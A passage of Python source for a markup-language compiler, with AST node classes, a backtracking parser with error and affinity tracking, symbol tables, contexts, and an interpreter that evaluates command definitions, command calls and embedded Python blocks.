paragraphs[-1].end_pos elif ending_paragraph_break: self.end_pos = ending_paragraph_break.end_pos elif starting_paragraph_break: self.end_pos = starting_paragraph_break.end_pos else: self.end_pos = DUMMY_POSITION.copy() def __repr__(self): return f'{self.__class__.__name__}({self.paragraphs})' class ParagraphNode: __slots__ = ['start_pos', 'end_pos', 'writing', 'paragraph_break'] def __init__(self, paragraph_break, writing): self.paragraph_break = paragraph_break # Token self.writing = writing # WritingNode self.start_pos = writing.start_pos if paragraph_break: self.end_pos = paragraph_break.end_pos else: self.end_pos = writing.end_pos def __repr__(self): return f'{self.__class__.__name__}({self.writing})' class WritingNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['writing']) def __init__(self, writing): """ writing can be either a python node or a plain_text node. """ super().__init__(writing) self.writing = writing # PythonNode or PlainTextNode def __repr__(self): return f'{self.__class__.__name__}({self.writing})' class PythonNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['python', 'python_string']) def __init__(self, python): """ python is a single python Token (PASS1EXEC|PASS2EXEC|PASS1EVAL|PASS2EVAL) """ super().__init__(python) self.python = python # one of the exec or eval Nodes self.python_string = None def __repr__(self): return f'{self.__class__.__name__}({self.python})' class CommandDefNode: __slots__ = ['start_pos', 'end_pos', 'cmnd_name', 'cmnd_params', 'cmnd_key_params', 'text_group'] def __init__(self, cmnd_name, cmnd_params, cmnd_key_params, text_group): self.start_pos = cmnd_name.start_pos self.end_pos = text_group.end_pos self.cmnd_name = cmnd_name # IDENTIFIER Token self.cmnd_params = cmnd_params # list of CommandParamNodes self.cmnd_key_params = cmnd_key_params # list of CommandKeyParamNodes self.text_group = text_group # the text_group that the command will run def __repr__(self): cmnd_args = '' for i, arg in enumerate(self.cmnd_params): if i > 0: cmnd_args += ', ' cmnd_args += f'{arg}' return f'{self.__class__.__name__}({self.cmnd_name} = ({cmnd_args}) ' + '{' + f'{self.text_group}' + '}' + ')' class CommandParamNode: __slots__ = ['start_pos', 'end_pos', 'identifier'] def __init__(self, identifier): self.start_pos = identifier.start_pos self.end_pos = identifier.end_pos self.identifier = identifier # IDENTIFIER Token def __repr__(self): return f'{self.__class__.__name__}({self.identifier})' class CommandKeyParamNode: __slots__ = ['start_pos', 'end_pos', 'key', 'text_group'] def __init__(self, key, text_group): self.start_pos = key.start_pos self.end_pos = text_group.end_pos self.key = key # WORD Token self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.text_group})' class CommandCallNode: __slots__ = ['start_pos', 'end_pos', 'cmnd_name', 'cmnd_tex_args', 'cmnd_key_args'] def __init__(self, cmnd_name, cmnd_tex_args, cmnd_key_args): self.start_pos = cmnd_name.start_pos self.end_pos = cmnd_name.end_pos self.cmnd_name = cmnd_name # IDENTIFIER Token self.cmnd_tex_args = cmnd_tex_args # list of CommandTexArgNode self.cmnd_key_args = cmnd_key_args # dict of keyword:CommandArgNode pairs def __repr__(self): string = f'{self.__class__.__name__}(\\{self.cmnd_name}' # add args for arg in self.cmnd_tex_args: string += '{' + f'{arg}' + '}' # add kwargs for kwarg in self.cmnd_key_args: string += '{' + f'{kwarg.key}={kwarg.text_group}' + '}' # end string string += ')' return string class CommandTexArgNode: __slots__ = ['start_pos', 'end_pos', 'text_group'] def __init__(self, text_group): self.start_pos = text_group.start_pos self.end_pos = text_group.end_pos self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.text_group})' class CommandKeyArgNode: __slots__ = ['start_pos', 'end_pos', 'key', 'text_group'] def __init__(self, key, text_group): self.start_pos = key.start_pos self.end_pos = text_group.end_pos self.key = key # IDENTIFIER Token self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.key}={self.text_group})' class TextGroupNode: __slots__ = ['start_pos', 'end_pos', 'ocbrace', 'document', 'ccbrace'] def __init__(self, ocbrace, document, ccbrace): self.start_pos = ocbrace.start_pos self.end_pos = ccbrace.end_pos self.ocbrace = ocbrace self.document = document self.ccbrace = ccbrace def __repr__(self): return f'{self.__class__.__name__}({self.document})' class PlainTextNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['plain_text']) def __init__(self, plain_text:list): """ plain_text is a list of OCBRACE, CCBRACE, EQUAL_SIGN, and WORD Tokens in any order. """ self.plain_text = plain_text # list of Tokens if len(plain_text) > 0: self.start_pos = plain_text[0].start_pos self.end_pos = plain_text[-1].end_pos else: self.start_pos = DUMMY_POSITION.copy() self.end_pos = DUMMY_POSITION.copy() def __repr__(self): return f'{self.__class__.__name__}({self.plain_text})' # ----------------------------------------------------------------------------- # Parser Class and Related class ParseResult: """ A class that wraps results from the Parser because the parser will be trying out different things (is the next token plain text or a paragraph break? neither? then whats the next thing it could be?) and this ParseResult allows the Parser to try something and then undo that thing. An error can also can be returned if none of the things that were supposed to work actually work. """ __slots__ = ['error', 'node', 'last_registered_advance_count', 'advance_count', 'to_reverse_count', 'affinity'] def __init__(self): self.error = None self.node = None self.last_registered_advance_count = 0 self.advance_count = 0 self.to_reverse_count = 0 self.affinity = 0 def register_advancement(self): """ Registers that the Parser advanced a token so that that advancement can be undone later if need be. """ self.last_registered_advance_count = 1 self.advance_count += 1 def register(self, res): """ Registers a result, adding the error to this result if there was one and returning the node. """ self.last_registered_advance_count = res.advance_count self.advance_count += res.advance_count self.affinity += res.affinity if res.error: self.error = res.error return res.node def register_try(self, res): """ Returns None if the given result did not work and the Node of the result if it did. """ if res.error: self.affinity += res.affinity self.to_reverse_count = res.advance_count return None return self.register(res) def reversing(self): """ The last try is being reverse so set the to_reverse_count back to 0 and return what it was so that it can be reversed. """ to_reverse = self.to_reverse_count self.to_reverse_count = 0 return to_reverse def add_affinity(self, amt=1): """ Affinity is how far along the result was getting before it ran into an error. This is useful for when there are multiple possibilities as to where the errors my be coming from such as in the writing rule of this language's grammar. This affinity can be used to see whether any of the rules applied or not because if non of them did, then the parser is probably just at the end of the file. """ self.affinity += amt def success(self, node): self.node = node return self def failure(self, error): if not self.error or self.last_registered_advance_count == 0: self.error = error return self class Parser: """ Creates an Abstract Syntax Tree based on the rules in grammar.txt. Look at grammar.txt for the outline of what the Parser is trying to do. It takes each rule and recursively tries to make it work. When a rule does not work, it returns a ParseResult with an error in ParseResult.error. In the case of the error, the index is changed back to what it was before the Parser tried the rule. If there was no error, then the Node that was successfully created by the rule is returned. This Parser uses a top-down approach to parsing, as opposed to a bottom-up approach to parsing, which is a far harder method of parsing to write a Parser for. """ def __init__(self, tokens, print_progress_bar=False): # Progress Printing Info self._print_progress_bar = print_progress_bar self._tokens_len = len(tokens) file_path = '' if self._tokens_len == 0 else tokens[0].start_pos.file_path self._progress_bar_prefix = prog_bar_prefix('Parsing', file_path) self._prog_bar_refresh = calc_prog_bar_refresh_rate(self._tokens_len) # Things needed to actually parse the tokens self._tokens = tokens self._tok_idx = -1 self._current_tok = None self._advance() def parse(self): """ Returns a ParseResult with either an error in res.error or a node in res.node """ if self._print_progress_bar: print_progress_bar(self._tok_idx, self._tokens_len, self._progress_bar_prefix) if self._current_tok.type == TT.FILE_START: res = self._file() else: res = self._document() if self._print_progress_bar: print_progress_bar(self._tok_idx, self._tokens_len, self._progress_bar_prefix) return res # ------------------------------ # Main Helper Methods def _advance(self, parse_result=None): """ Advances to the next token. It returns the token before the new one and registers an advancement with the given parse_result for convenience. """ prev_token = self._current_tok if parse_result: parse_result.register_advancement() self._tok_idx += 1 self._update_current_tok() return prev_token def _reverse(self, parse_result): self._tok_idx -= parse_result.reversing() self._update_current_tok() def _update_current_tok(self): if self._tok_idx >= 0 and self._tok_idx < len(self._tokens): self._current_tok = self._tokens[self._tok_idx] else: # TT.NONE_LEFT will NOT match any Tokens needed for any rule, # forcing an error to occur in each rule and the rules to # terminate. This is much safer than just not changing the token # any more when you run out of tokens to parse because now, even if # you have a low-level rule that will accept infinitely many of a # token of a certain type, that type will not be infinitely given # if the list of tokens ends on it if self._current_tok is not None: self._current_tok = Token(TT.NONE_LEFT, 'NO TOKENS LEFT', self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy()) else: dummy_start_pos = DUMMY_POSITION.copy() dummy_end_pos = dummy_start_pos.copy() self._current_tok = Token(TT.NONE_LEFT, 'NO TOKENS LEFT', dummy_start_pos, dummy_end_pos) # ------------------------------ # Rules def _file(self): """ A document but with a FILE_START token at the beginning and a FILE_END token at the end. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() if self._current_tok.type == TT.FILE_START: file_start = self._advance(res) else: return res.failure(InvalidSyntaxError(start_pos, start_pos.copy().advance(), 'For some reason, your file does not begin with a FILE_START Token. This is a Compiler Error, so contact the developer and let them know.')) document = res.register(self._document()) if res.error: return res if self._current_tok.type == TT.FILE_END: file_end = self._advance(res) else: return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), f'Reached the end of the file but there was no FILE_END Token. The file must have Invalid Syntax or the compiler is having issues.\nALL TOKENS: {self._tokens}\n\nLAST TOKEN SEEN: {self._current_tok}\n\nLast Token Seen Index: {self._tok_idx}')) return res.success(FileNode(file_start, document, file_end)) def _document(self): """ A document is a group of paragraphs, essentially. """ res = ParseResult() paragraphs = [] # will eat token if there, otherwise nothing self._eat_pb(res) print_prog_bar = self._print_progress_bar if print_prog_bar: refresh = self._prog_bar_refresh toks_len = self._tokens_len prefix = self._progress_bar_prefix while True: # paragraph will be None if the try failed, otherwise it will be the # new ParagraphNode result = self._paragraph() if result.error and result.affinity > 0: res.register(result) return res paragraph = res.register_try(result) # If, when we tried to make another paragraph, it failed, # that means that there are no more paragraphs left in the # document, so undo the try by going back the number of # tokens that the try went forward if not paragraph: self._reverse(res) break else: if print_prog_bar: i = self._tok_idx if (i % refresh) == 0: print_progress_bar(i, toks_len, prefix) paragraphs.append(paragraph) self._eat_pb(res) return res.success(DocumentNode(paragraphs)) def _paragraph(self): """ A peice of writing, with a paragraph break before it possibly. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() # Check for Paragraph Break paragraph_break = self._eat_pb(res) # Check for Writing writing = res.register(self._writing()) if res.error: return res # writing should be a WritingNode and paragraph_break is a Token of # type PARAGRAPH_BREAK return res.success(ParagraphNode(paragraph_break, writing)) def _writing(self): """ A peice of writing such as something to run in python, a command def or command call, text group, or pain text. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() results = [] new_res = self._python() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._cmnd_def() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._cmnd_call() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._plain_text() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._text_group() results.append(new_res) writing = res.register_try(new_res) if not writing: best_result = None for result in results: if result.affinity > 0 and ((not best_result) or result.affinity > best_result.affinity): best_result = result if not best_result: return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'There was no writing, but writing was expected.' )) else: return res.failure(best_result) # writing should be either a PythonNode or a PlainTextNode return res.success(WritingNode(writing)) def _python(self): """ This fulfills the python rule of the grammar. """ res = ParseResult() ct = self._current_tok type = self._current_tok.type # Python Switch Statement to figure out whether the token is a Python Token try: python = { TT.EXEC_PYTH1: ct, TT.EVAL_PYTH1: ct, TT.EXEC_PYTH2: ct, TT.EVAL_PYTH2: ct }[ct.type] except KeyError: return res.failure(InvalidSyntaxError(ct.start_pos.copy(), ct.start_pos.copy().advance(), 'Expected a Token of Type PASS1EXEC, PASS1EVAL, PASS2EXEC, or PASS1EVAL but did not get one.') ) self._advance(res) # python should be a single python Token of type PASS1EXEC or PASS2EXEC # or PASS1EVAL or PASS2EVAL return res.success(PythonNode(python)) def _cmnd_def(self): """ A command definition. For example: \\hi = (\\first_name, \\last_name={}) { Hello \\first_name \\last_name } """ res = ParseResult() cmnd_name = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) equal_sign = res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) cmnd_params = [] # (OPAREN PB? (cmnd_params PB? (COMMA PB? cmnd_params)*)? PB? CPAREN)? oparen = res.register_try(self._need_token(TT.OPAREN)) if oparen: res.add_affinity() self._eat_pb(res) cmnd_param = res.register_try(self._cmnd_param()) if not cmnd_param: self._reverse(res) else: res.add_affinity() cmnd_params.append(cmnd_param) while True: self._eat_pb(res) comma = res.register_try(self._need_token(TT.COMMA)) if not comma: self._reverse(res) break res.add_affinity() cmnd_param = res.register(self._cmnd_param()) if res.error: return res.failure(InvalidSyntaxError( comma.start_pos.copy(), comma.end_pos.copy(), 'Extra comma. You need to either have a variable name after it or remove it.' )) res.add_affinity() cmnd_params.append(cmnd_param) self._eat_pb(res) cparen = res.register(self._need_token(TT.CPAREN)) if res.error: return res.failure(InvalidSyntaxError( oparen.start_pos, oparen.end_pos, 'You need to have a matching closing parenthesis ")" to match this parenthisis after your parameters for the Command Definition.' )) res.add_affinity() self._eat_pb(res) # text_group text_group = res.register(self._text_group()) if res.error: return res.failure(InvalidSyntaxError( self._current_tok.start_pos, self._current_tok.end_pos, 'Here, you need to have a pair of curly brackets "{}", at the very least, in order to finish off this command definition.' )) res.add_affinity() cmnd_tex_params = [] cmnd_key_params = [] for param in cmnd_params: if isinstance(param, CommandParamNode): cmnd_tex_params.append(param) elif isinstance(param, CommandKeyParamNode): cmnd_key_params.append(param) else: raise Exception(f'This was outputted as a command parameter but is not one: {param}') return res.success(CommandDefNode(cmnd_name, cmnd_tex_params, cmnd_key_params, text_group)) def _cmnd_param(self): """ A command Parameter. So either \\hi = {a default value} or \\hi """ res = ParseResult() self._eat_pb(res) text_group = res.register_try(self._cmnd_key_param()) if text_group: return res.success(text_group) self._reverse(res) text_group = res.register_try(self._cmnd_tex_param()) if text_group: return res.success(text_group) else: self._reverse(res) return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'Expected a Command Parameter here.')) def _cmnd_key_param(self): """ A command parameter so \\hi = {a default value} """ res = ParseResult() self._eat_pb(res) key = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() return res.success(CommandKeyParamNode(key, text_group)) def _cmnd_tex_param(self): """ A command parameter that is just an IDENTIFIER """ res = ParseResult() ident = res.register(self._need_token(TT.IDENTIFIER)) res.add_affinity() if not ident: return res else: return res.success(CommandParamNode(ident)) def _cmnd_call(self): """ A command call like \\hi or \\hi{FirstName}{\\last_name={LastName}} """ res = ParseResult() cmnd_name = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() args = [] while True: arg = res.register_try(self._cmnd_arg()) if not arg: self._reverse(res) break res.add_affinity() args.append(arg) cmnd_tex_args = [] cmnd_key_args = [] for arg in args: if isinstance(arg, CommandTexArgNode): cmnd_tex_args.append(arg) elif isinstance(arg, CommandKeyArgNode): cmnd_key_args.append(arg) else: raise Exception(f'Expected a command argument Node, instead got: {arg}') return res.success(CommandCallNode(cmnd_name, cmnd_tex_args, cmnd_key_args)) def _cmnd_arg(self): """ A cmnd argument such as {FirstName} or {\\first_name={FirstName}} in \\hi{FirstName}{\\first_name={FirstName}} """ res = ParseResult() arg = res.register_try(self._cmnd_key_arg()) if arg: return res.success(arg) self._reverse(res) arg = res.register_try(self._cmnd_tex_arg()) if arg: return res.success(arg) self._reverse(res) return res.failure(InvalidSyntaxError( self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'Expected a Command Argument here.' )) def _cmnd_tex_arg(self): """ A command text argument \\he{FirstName} """ res = ParseResult() text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() return res.success(CommandTexArgNode(text_group)) def _cmnd_key_arg(self): """ A command key argument such as {\\first_name={FirstName}} in \\he{\\first_name={FirstName}} """ res = ParseResult() res.register(self._need_token(TT.OCBRACE)) if res.error: return res res.add_affinity() ident = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() res.register(self._need_token(TT.CCBRACE)) if res.error: return res res.add_affinity() return res.success(CommandKeyArgNode(ident, text_group)) def _text_group(self): """ A text group is { document } """ res = ParseResult() ocb = res.register(self._need_token(TT.OCBRACE)) if res.error: return res res.add_affinity() document = res.register(self._document()) if res.error: return res res.add_affinity() ccb = res.register(self._need_token(TT.CCBRACE)) if res.error: return res res.add_affinity() return res.success(TextGroupNode(ocb, document, ccb)) def _plain_text(self): res = ParseResult() plain_text = [] while True: cc = self._current_tok start_pos = cc.start_pos # Python Switch Statement try: new_tok = { TT.BACKSLASH: cc, TT.EQUAL_SIGN: cc, TT.COMMA: cc, TT.OPAREN: cc, TT.CPAREN: cc, TT.OBRACE: cc, TT.CBRACE: cc, TT.WORD: cc }[cc.type] # If I remember correctly, you cannot directly wrap the dict # in this append method because it appends the error # to the list when there is an error, which is problematic plain_text.append(new_tok) res.add_affinity() except KeyError: break self._advance(res) if len(plain_text) == 0: return res.failure(InvalidSyntaxError(start_pos.copy(), start_pos.copy().advance(), 'Expected atleast 1 WORD, BACKSLASH, OCBRACE, CCBRACE, or EQUAL_SIGN Token.' ) ) # plain_text is a list of OCBRACE, CCBRACE, EQUAL_SIGN, and WORD Tokens # in any order. return res.success(PlainTextNode(plain_text)) # ------------------------------------------------------------------------- # Non-Rule Lesser Help Methods def _eat_pb(self, parse_result): """ Eat a PARAGRAPH_BREAK A helper method that, unlike the other methods, just exists because there are many rules with PARAGRAPH_BREAK? in them. This method does that, returning None if the current token is not a PARAGRAPH_BREAK and the PARAGRAPH_BREAK Token if there is one. If a PARAGRAPH_BREAK token is found, the method also advances past past it. """ par_break = None if self._current_tok.type == TT.PARAGRAPH_BREAK: par_break = self._advance(parse_result) return par_break def _need_token(self, token_type): """ A helper method that just checks that a token exists right now. Will return a ParseResult with an error if the token is not the required one and a ParseResult with the node of the result being the token if the current token is the correct one. This method exists not because there is a Node for it (there is not one) but because what this method does is something that needs to be done a lot in the parse methods. """ res = ParseResult() if not (self._current_tok.type == token_type): return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), f'Expected a Token of type {token_type}, but got token {self._current_tok}')) return res.success(self._advance(res)) # ----------------------------------------------------------------------------- # Interpreter and Related Classes class RunTimeResult: """ Wraps a return value in the Interpreter so that, when a visit method finishes visiting a Node, it can tell the Node that visited it various things such as whether to return immediately or not. """ __slots__ = ['value', 'error'] def __init__(self): self.reset() def reset(self): self.value = None self.error = None def register(self, res): """ Register the returned result from a Node you just visited. This way, if you should return because an error occured or something, you can. """ self.error = res.error return res.value def success(self, value): self.reset() self.value = value return self def failure(self, error): self.reset() self.error = error return self class SymbolTable: """ The symbol table is used to store the commands. """ def __init__(self, parent=None): self.symbols = {} self.parent = parent def get(self, name): """ Returns the value for the name if it is in the SymbolTable, None otherwise """ value = self.symbols.get(name, None) if value == None and self.parent: return self.parent.get(name) return value def set(self, name, value): """ Sets a the value for a name in the symbol table """ self.symbols[name] = value def remove(self, name): """ Removes a name from the symbol table. """ self.symbols.pop(name) def import_(self, other_symbol_table, commands_to_import=None): """ Imports the symbols of the other symbol table into this one. If commands_to_import is None, then import every command. Otherwise, only import the commands with the names listed. """ if commands_to_import is None: self.symbols.update(other_symbol_table.symbols) else: oth_syms = other_symbol_table.symbols for command_name in commands_to_import: if command_name in oth_syms: self.symbols[command_name] = oth_syms[command_name] else: raise AssertionError(f'Could not import {command_name}.') def copy(self): import copy new = SymbolTable(None if self.parent is None else self.parent.copy()) new.symbols = copy.deepcopy(self.symbols) return new def __repr__(self): string = f'\n{type(self).__name__}(' string += f'symbols={self.symbols}' string += ')' return string class Context: """ Provides Context for every command/amount of python code that is run. By that I mean that the Context determines what commands and variables are available and when. """ __slots__ = ['display_name', 'file_path', 'entry_pos', 'parent', '_globals', '_locals', 'symbols', '_token_document', 'global_level'] def __init__(self, display_name, file_path, parent=None, entry_pos=None, token_document=None, globals=None, locals=None, symbol_table=None): """ Context could be a function if in a function or the entire program (global) if not in a function. """ self.display_name = display_name # the command/program name self.file_path = file_path # the path to the file that the command is in self.entry_pos = entry_pos # the position in the code where the context changed (where the command was called) self.parent = parent # Parent context if there is one # These are the globals and locals used by Python. The SymbolTable is # used for Commands, not these self._globals = globals # dict or None self._locals = locals # dict or None # Make sure that there are globals self.globals() # will throw an error if there are no globals, even in parent contexts if symbol_table is not None: assert_instance(symbol_table, SymbolTable, or_none=False) self.symbols = symbol_table # SymbolTable elif parent is not None and parent.symbols is not None: self.symbols = SymbolTable(parent.symbols) else: self.symbols = SymbolTable() if token_document is not None: self._token_document = token_document else: self._token_document = [] self.global_level = True def __repr__(self): string = f'\n{type(self).__name__}(\n' string += f'\tdisplay_name={self.display_name}' string += f'\tsymbols={self.symbols}' string += f'\tglobals={self._globals}' string += f'\tlocals={self._locals}' string += f'\tparent={self.parent}' string += '\n)' return string def copy(self): _globals = None if self._globals is None else {key:val for key, val in self._globals.items()} _locals = None if self._locals is None else {key:val for key, val in self._locals.items()} entry_pos = None if self.entry_pos is None else self.entry_pos.copy() parent = None if self.parent is None else self.parent.copy() new = Context(self.display_name, self.file_path, parent, entry_pos, self._token_document[:], _globals, _locals) new.symbols = self.symbols.copy() return new def gen_child(self, child_display_name:str, child_entry_pos=None, locals_to_add=None): """ Generates a child context i.e. a subcontext such as that which is inside a command. locals_to_add are things like the \\test variable below, which should be made available to any Python Code that is inside the command \\# Global Context \\hello = (\\test) = { \\# This should have a subcontext where commands can be defined in \\# here but not mess with those defined in the global context/ \\# any parent context \\test \\# is defined in this child context } \\# \\test is undefined here, in this global context """ # Generate the new python locals. Because only one locals dict can be # passed to an exec or eval method at a time, it must have all the # references to parent locals in it so that it works as if it could # look up the locals hierarchy as the SymbolTables do for Commands # In other words, the child Context's locals must be a superset of this # Context's locals child_lcls = {} if (self._locals is None) else {key:val for key, val in self._locals.items()} if locals_to_add: child_lcls.update(locals_to_add) parent = self # Give the new context a reference to globals so that it does not have # to walk up a bunch of parents to get it anyway child = Context(child_display_name, self.file_path, parent, child_entry_pos, self.token_document(), self.globals(), child_lcls, SymbolTable(self.symbols)) child.global_level = False return child def import_(self, other_context, tokens_to_import=[], commands_to_import=None): """ Takes another context and imports its contents into this one. """ self.symbols.import_(other_context.symbols, commands_to_import) self.globals().update(other_context.globals()) self.token_document().extend(tokens_to_import) def globals(self): if self._globals is not None: return self._globals elif self.parent is not None: return self.parent.globals() else: raise Exception("You did not pass in globals to the Global Context.") def locals(self): return self._locals def token_document(self): """ The list of tokens that should be given to the Placer object to actually make the PDFDocument. """ return self._token_document def set_token_document(self, new_doc): self._token_document = new_doc class InterpreterFlags: """ Flags for the Interpreter so that it can know what to do when it does a pass over an Abstract Syntax Tree created by the Parser. The difference between these flags and the context in the Interpreter is that things in the flags stay the same for the entire AST pass whereas the things in the context could change at each visit to a node. """ def __init__(self): pass class Interpreter: """ The interpreter visits each node in the Abstract Syntax Tree generated by the Parser and actually runs the corresponding code for the node. """ def __init__(self): self._context_stack = [] self._curr_context = None self._command_node_stack = [] self._curr_command_node = None def _push_context(self, context): self._context_stack.append(context) self._curr_context = context def _pop_context(self): self._context_stack.pop() self._curr_context = self._context_stack[-1] if len(self._context_stack) > 0 else None def curr_context(self): return self._curr_context def _push_command_node(self, command_node): self._command_node_stack.append(command_node) self._curr_command_node = command_node def _pop_command_node(self): self._command_node_stack.pop() self._curr_command_node = self._command_node_stack[-1] if len(self._command_node_stack) > 0 else None def curr_command_node(self): return self._curr_command_node def visit_root(self, node, context, flags, print_progress=False): """ The visit to the root node of an AST. """ if print_progress: print(prog_bar_prefix(f'{OUT_TAB}Running AST for ', f'{context.display_name}', align='>', suffix='', append='...')) prev_context = self._curr_context self._curr_context = context result = self.visit(node, context, flags) self._curr_context = prev_context if print_progress: print(prog_bar_prefix(f'{OUT_TAB}Done Running AST for ', context.display_name, align='>', suffix='', append='')) return result def visit(self, node, context, flags): method_name = f'_visit_{type(node).__name__}' method = getattr(self, method_name, self._no_visit_method) return method(node, context, flags) def _no_visit_method(self, node, context, flags): raise Exception(f'No _visit_{type(node).__name__} method defined in Interpreter') # ------------------------------ # Rule Implementations def _visit_FileNode(self, node, context, flags): res = RunTimeResult() result = res.register(self.visit(node.document, context, flags)) if res.error: return res return res.success(result) def _visit_DocumentNode(self, node, context, flags): res = RunTimeResult() document = [] was_global = context.global_level if was_global: context.global_level = False for paragraph in node.paragraphs: write_tokens = res.register(self.visit(paragraph, context, flags)) if res.error: return res else: if was_global: context.token_document().extend(write_tokens) document.extend(write_tokens) if was_global: context.global_level = True return res.success(document) def _visit_ParagraphNode(self, node, context, flags): res = RunTimeResult() # How long the document has gotten so far i = len(context.token_document()) # Visit the writing (could be Plaintext, Python, command def, or a Command call) write_tokens = res.register(self.visit(node.writing, context, flags)) if res.error: return res if len(write_tokens) > 0: # Command was called and this Class was used to make the length # of the write_tokens > 0 because a command was called if write_tokens[0] == Interpreter.CommandCalled: write_tokens.pop(0) if node.paragraph_break: # Add the paragraph break to before the current text was added context.token_document().insert(i, node.paragraph_break) return res.success(write_tokens) def _visit_WritingNode(self, node, context, flags): """ Visits a WritingNode. If successful, this method will return a string of what the ParagraphNode is supposed to write. """ res = RunTimeResult() write_tokens = res.register(self.visit(node.writing, context, flags)) # Error Handling if res.error: return res return res.success(write_tokens) def _visit_PythonNode(self, node, context, flags): res = RunTimeResult() python_token = node.python tt = python_token.type # Execute or eval python if tt == TT.EXEC_PYTH1: python_result = exec_python(python_token.value, context.globals(), context.locals()) elif tt == TT.EVAL_PYTH1: python_result = eval_python(python_token.value, context.globals(), context.locals()) # For second pass python, it needs to be kept until we are actually # placing the text on the PDF, then the Placer will be made available # to the python and the code can make changes to the PDF elif tt in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): python_result = [python_token.gen_pass_2_python( \ None if context.locals() is None else \ {key:val for key, val in context.locals().items()})] else: raise Exception(f"The following token was found in a PythonNode, it is not supposed to be in a PythonNode: {tt}") if isinstance(python_result, type(None)): python_result = [] elif isinstance(python_result, str): python_result = Tokenizer.plaintext_tokens_for_str(python_result) elif isinstance(python_result, MarkedUpText): python_result = Tokenizer.tokens_for_marked_up_text(python_result) elif isinstance(python_result, Exception) or issubclass(type(python_result), Exception): return res.failure(PythonException(node.start_pos.copy(), node.end_pos.copy(), 'An error occured while running your Python code.', python_result, context)) return res.success(python_result) def _visit_CommandDefNode(self, node, context, flags): res = RunTimeResult() cmnd_name = node.cmnd_name.value cmnd_params = node.cmnd_params cmnd_key_params = node.cmnd_key_params text_group = node.text_group context.symbols.set(cmnd_name, Command( cmnd_params, cmnd_key_params, text_group )) return res.success([]) def _visit_CommandCallNode(self, node, context, flags): res = RunTimeResult() tokens = [] cmnd_name_str = node.cmnd_name.value command_to_call = context.symbols.get(cmnd_name_str) self._push_command_node(node) if command_to_call is None: # The command is undefined return res.failure(RunTimeError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), '"\\' + f'{cmnd_name_str}" is undefined.', context )) elif isinstance(command_to_call, TextGroupNode): # Handle when the "command" is actually a parameter that contains # text. For example, in # # \hello = (\test) { # \test # } # # \test is a actually storing a TextGroupNode when the command # \hello is called, so this method handles returning the TextGroupNode # that that \test contains when \test is called result = res.register(self.visit(command_to_call, context, flags)) if res.error: return res if result: tokens.extend(result) else: # Command is defined and we need to call it min_args = len(command_to_call.params) max_args = min_args + len(command_to_call.key_params) num_positional_args = len(node.cmnd_tex_args) num_key_args = len(node.cmnd_key_args) num_args_given = num_positional_args + num_key_args # Check if enough positional arguments were given if num_positional_args < min_args: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The "{cmnd_name_str}" command requires {min_args} argument(s), but {num_positional_args} was/were given.', )) # Check if too many arguments were given if num_args_given > max_args: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The "{cmnd_name_str}" command takes {max_args} argument(s) max, but {num_args_given} was/were given.', )) cmnd_args = {} # Add all the command names first cmnd_and_key_param_names = [] for param in command_to_call.params: name = param.identifier.value if name in cmnd_and_key_param_names: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The argument "{name}" was given more than one time. Every argument can only be given once, either by a key-argument or a positional argument.' )) cmnd_and_key_param_names.append(name) # Take each Parameter key-value pair (so the key-value pairs # in the definition of the command) and add them to the dict for cmnd_key_param in command_to_call.key_params: name = cmnd_key_param.key.value # Now add the key-params because the positional arguments will # fullfill parameters and key-parameters in the order that # they are in cmnd_and_key_param_names if name in cmnd_and_key_param_names: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The argument "{name}" was given more than one time. Every argument can only be given once, either by a key-argument or a positional argument.' )) cmnd_and_key_param_names.append(name) cmnd_args[name] = cmnd_key_param.text_group # Now replace those key-value pairs from the definiton of the command # with those given in the call of command for key_arg in node.cmnd_key_args: # key params CommandKeyParamNode key = key_arg.key.value if not (key in cmnd_args): return res.failure(InvalidSyntaxError(key_arg.key.start_pos.copy(), key_arg.key.end_pos.copy(), f'"{key}" is not defined in command "{cmnd_name_str}". In other words, this key is not defined as a key-argument in the command\'s definition.', )) 